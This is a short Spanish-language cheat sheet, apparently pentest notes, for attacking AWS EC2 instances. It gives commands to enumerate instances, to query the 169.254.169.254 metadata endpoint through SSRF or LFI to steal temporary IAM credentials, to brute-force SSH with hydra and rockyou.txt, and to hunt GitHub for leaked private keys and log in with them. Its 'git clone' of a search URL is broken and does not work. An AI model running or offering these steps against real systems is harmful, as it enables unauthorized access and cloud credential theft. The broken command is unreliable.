Enumeración:

aws ec2 describe-instances --query 'Reservations[].Instances[].[InstanceId, PublicIpAddress, State.Name]' --output table

Obtener metadatos internos (si hay SSRF o LFI):

curl http://169.254.169.254/latest/meta-data/

Si esta URL es accesible desde una aplicación vulnerable, un atacante podría robar credenciales temporales de IAM.

Bruteforce SSH

hydra -l ec2-user -P rockyou.txt ssh://<IP-EC2>

Buscar claves privadas expuestas en GitHub:

bash
CopiarEditar
git clone <https://github.com/search?q=aws+ec2+key&type=code>

Si encuentras archivos .pem o .ppk, intenta conectarte con:

bash
CopiarEditar
ssh -i clave.pem ec2-user@<IP-EC2>

📌 Si obtienes acceso SSH, verifica permisos IAM desde la instancia:

bash
CopiarEditar
aws sts get-caller-identity

Si responde, significa que la máquina tiene permisos de IAM activos.